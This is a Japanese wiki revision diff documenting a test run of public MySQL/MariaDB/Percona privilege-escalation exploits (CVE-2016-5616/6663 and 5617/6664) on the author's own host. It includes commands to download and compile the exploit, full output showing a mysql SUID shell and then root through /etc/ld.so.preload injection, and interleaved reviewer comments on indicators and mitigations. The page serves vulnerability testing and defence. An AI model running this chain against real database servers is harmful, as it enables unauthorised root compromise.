1: 2016-11-11 (Fri) 11:23:42 iseki |
2: 2016-11-11 (Fri) 11:48:56 iseki |
- | *** CVE-2016-5616, 5617 [#u7059892] | + | ** CVE-2016-5616, 5617 [#u7059892] |
| + | *** [[MySQL]], [[MariaDB]], [[Percona]] [#t6c6abf6] |
| - 該当マシンにアカウントがあり,データベースのアクセス(書き込み)可能な場合,Root権限を奪取される | | - 該当マシンにアカウントがあり,データベースのアクセス(書き込み)可能な場合,Root権限を奪取される |
- | - MySQL の初期ユーザ等が残っている場合は,特に危険. | + | - MySQL の初期ユーザ等が残っている場合は特に危険. |
| + | |
| + | - [[CVE-2016-5616>http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5616]] |
| + | - [[CVE-2016-5617>http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5617]] |
| | | |
| - http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html | | - http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html |
| - http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html | | - http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html |
| + | #br |
| | | |
- | - デフォルトの | + | **** デフォルトユーザ [#c3c58224] |
| + | - パスワードなし,ユーザ名なしのデータはインストール時に削除すべき. |
| MariaDB [mysql]> select Host,User,Password from user; | | MariaDB [mysql]> select Host,User,Password from user; |
| +-----------+------+-------------------------------------------+ | | +-----------+------+-------------------------------------------+ |
| +-----------+------+-------------------------------------------+ | | +-----------+------+-------------------------------------------+ |
| | | |
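Review bot: the `select Host,User,Password from user` listing under the default-user item shows only the two table border rows, so the reader cannot see which anonymous or password-less rows the item tells them to delete; paste the result rows (with the Password hashes masked) or state how many such rows were present. The precondition given in the first bullet (a local account plus write access to the database) is also the mitigation hook worth spelling out here: the PoC that follows needs CREATE and DROP on some schema, so restricting which accounts hold those privileges belongs next to the advice to remove the installer's default users, together with a line recording whether the vendor fixes referenced by the two CVE links were applied on the test host, which this revision does not say.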
| + | **** mysql ユーザアカウントのダッシュ [#z9d7510f] |
| + | - Exploit code : [[mysql-privesc-race.c>ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c]] |
| | | |
- | [iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test | + | $ wget ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c |
| + | $ gcc -o mysql-privesc-race mysql-privesc-race.c -I/usr/local/mysql/include/mysql -L/usr/local/mysql/lib -lmysqlclient |
| | | |
- | MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit | |
- | mysql-privesc-race.c (ver. 1.0) | |
| | | |
- | CVE-2016-6663 / CVE-2016-5616 | + | [iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test |
| | | |
- | For testing purposes only. Do no harm. | + | MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit |
| + | mysql-privesc-race.c (ver. 1.0) |
| | | |
- | Discovered/Coded by: | + | CVE-2016-6663 / CVE-2016-5616 |
| | | |
- | Dawid Golunski | + | For testing purposes only. Do no harm. |
- | http://legalhackers.com | + | |
| | | |
| + | Discovered/Coded by: |
| | | |
- | [+] Starting the exploit as: | + | Dawid Golunski |
- | uid=502(iseki) gid=100(users) 所属グループ=100(users) | + | http://legalhackers.com |
| | | |
- | [+] Connecting to the database `test` as @localhost | |
| | | |
- | [+] Creating exploit temp directory /tmp/mysql_privesc_exploit | + | [+] Starting the exploit as: |
| + | uid=502(iseki) gid=100(users) 所属グループ=100(users) |
| | | |
- | [+] Creating mysql tables | + | [+] Connecting to the database `test` as @localhost |
| | | |
- | DROP TABLE IF EXISTS exploit_table | + | [+] Creating exploit temp directory /tmp/mysql_privesc_exploit |
- | DROP TABLE IF EXISTS mysql_suid_shell | + | |
- | CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' | + | |
- | CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' | + | |
| | | |
- | [+] Copying bash into the mysql_suid_shell table. | + | [+] Creating mysql tables |
- | After the exploitation the following file/table will be assigned SUID and executable bits : | + | |
- | -rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD | + | |
| | | |
- | [+] Entering the race loop... Hang in there... | + | DROP TABLE IF EXISTS exploit_table |
- | ->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> | + | DROP TABLE IF EXISTS mysql_suid_shell |
| + | CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' |
| + | CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' |
| | | |
- | [+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell: | + | [+] Copying bash into the mysql_suid_shell table. |
| + | After the exploitation the following file/table will be assigned SUID and executable bits : |
| + | -rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD |
| | | |
- | -rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD | + | [+] Entering the race loop... Hang in there... |
| + | ->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> |
| | | |
- | [+] Spawning the mysql SUID shell now... | + | [+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell: |
- | Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) | + | |
- | | + | |
- | mysql_suid_shell.MYD-4.1$ whoami | + | |
- | mysql | + | |
| | | |
| + | -rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD |
| | | |
| + | [+] Spawning the mysql SUID shell now... |
| + | Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) |
| | | |
| + | mysql_suid_shell.MYD-4.1$ whoami |
| + | mysql |
| | | |
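Review bot: the section shows the PoC succeeding but never names the observable artefacts a defender can key on, all of which are in the captured output: `CREATE TABLE ... engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'` statements issued by an ordinary account, a `.MYD` file under `/tmp` that is mysql-owned and ends up with the setuid bit (`-rwsrwxrwx`), and a race loop that needed 12874 attempts in this run. Suggest one sentence after the listing saying that `DATA DIRECTORY`/`INDEX DIRECTORY` clauses are ignored when mysqld is started with `symbolic-links=0` (`--skip-symbolic-links`), and one recording the MariaDB version and whether the CVE-2016-6663 fix was present on `rigel-b`, since without that the reader cannot tell which server builds the run reproduces on.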
- | mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err | + | **** mysql アカウントからの root アカウントのダッシュ [#l4b08281] |
| + | - Exploit code : [[mysql-chowned.sh>ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-chowned.sh]] |
| | | |
- | MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit | |
- | mysql-chowned.sh (ver. 1.0) | |
| | | |
- | CVE-2016-6664 / CVE-2016-5617 | + | mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err |
| | | |
- | Discovered and coded by: | + | MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit |
| + | mysql-chowned.sh (ver. 1.0) |
| | | |
- | Dawid Golunski | + | CVE-2016-6664 / CVE-2016-5617 |
- | http://legalhackers.com | + | |
| | | |
- | [+] Starting the exploit as | + | Discovered and coded by: |
- | uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users) | + | |
| | | |
- | [+] Target MySQL log file set to /var/mysql/rigel-b.err | + | Dawid Golunski |
| + | http://legalhackers.com |
| | | |
- | [+] Compiling the privesc shared library (/tmp/privesclib.c) | + | [+] Starting the exploit as |
| + | uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users) |
| | | |
- | [+] Backdoor/low-priv shell installed at: | + | [+] Target MySQL log file set to /var/mysql/rigel-b.err |
- | -rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh | + | |
| | | |
- | [+] Symlink created at: | + | [+] Compiling the privesc shared library (/tmp/privesclib.c) |
- | lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload | + | |
| | | |
- | [+] Waiting for MySQL to re-open the logs/MySQL service restart... | + | [+] Backdoor/low-priv shell installed at: |
| + | -rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh |
| | | |
- | [+] Waiting for MySQL to re-open the logs/MySQL service restart... | + | [+] Symlink created at: |
- | ./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません | + | lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload |
- | Do you want to kill mysqld process to instantly get root? :) ? [y/n] y | + | |
- | Got it. Executing 'killall mysqld' now... | + | |
| | | |
- | [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: | + | [+] Waiting for MySQL to re-open the logs/MySQL service restart... |
- | -rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload | + | |
| | | |
- | [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload | + | [+] Waiting for MySQL to re-open the logs/MySQL service restart... |
| + | ./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません |
| + | Do you want to kill mysqld process to instantly get root? :) ? [y/n] y |
| + | Got it. Executing 'killall mysqld' now... |
| | | |
- | [+] The /etc/ld.so.preload file now contains: | + | [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: |
- | /tmp/privesclib.so | + | -rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload |
| | | |
- | [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! | + | [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload |
- | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh | + | |
| | | |
- | [+] Rootshell got assigned root SUID perms at: | + | [+] The /etc/ld.so.preload file now contains: |
- | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh | + | /tmp/privesclib.so |
| | | |
- | Got root! The database server has been ch-OWNED ! | + | [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! |
| + | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh |
| | | |
- | [+] Spawning the rootshell /tmp/mysqlrootsh now! | + | [+] Rootshell got assigned root SUID perms at: |
| + | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh |
| | | |
- | mysqlrootsh-4.1# whoami | + | Got root! The database server has been ch-OWNED ! |
- | root | + | |
| | | |
| + | [+] Spawning the rootshell /tmp/mysqlrootsh now! |
| | | |
- | [/code] | + | mysqlrootsh-4.1# whoami |
| + | root |
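Review bot: the root-escalation section reproduces the script banner verbatim but does not call out the two conditions that make the chain work and that a defender should audit: the error log `/var/mysql/rigel-b.err` is replaceable by the mysql user (it is turned into a symlink to `/etc/ld.so.preload`), and the root-privileged restart then creates that target as `-rw-r----- mysql root`. The output also shows the chain stalling at "Waiting for MySQL to re-open the logs" until a manual `killall mysqld` (after `pidof` was reported missing at line 153 of the script), so a note that the step requires a log reopen or service restart would make the write-up accurate. Suggest ending the section with the mitigations implied by those lines: apply the CVE-2016-6664 vendor fix, keep the error-log directory owned by root rather than by the mysql user, and alert on `/etc/ld.so.preload` being created or modified, since on this host the file did not exist before the run.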